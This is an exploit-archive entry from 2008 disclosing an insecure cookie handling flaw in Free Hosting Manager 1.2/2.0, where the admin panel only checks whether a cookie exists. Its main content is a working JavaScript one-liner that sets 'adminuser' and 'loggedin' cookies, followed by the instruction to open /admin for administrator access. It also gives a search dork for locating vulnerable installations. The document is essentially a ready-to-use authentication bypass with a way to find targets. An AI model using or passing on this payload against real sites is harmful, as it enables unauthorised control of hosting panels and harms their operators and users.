[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability
# Published : 2008-08-06
# Author : Scary-Boys
# Previous Title : Quate CMS 0.3.4 (LFI/XSS) Multiple Remote Vulnerabilities
# Next Title : Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
#########################################################################
# #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
# #
#########################################################################
# #
# AUTHOR : Scary-Boys #
# HOME : http://scary-boys.com #
# Founded By : lvlr-Erfan #
# Download : http://www.fhm-script.com/download.php #
# #
#########################################################################
# #
# DorKs : "Powered By Free Hosting Manager" #
# #
#########################################################################
# #
# DESCRIPTION : #
# the admin panel only checks if the cookie exists. #
# #
#########################################################################
# #
# Vulnerability : #
# #
# javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
# #
#########################################################################
# #
# after running the javascript, Go to "/admin" & Refresh #
# #
#########################################################################
# www.Syue.com [2008-08-06]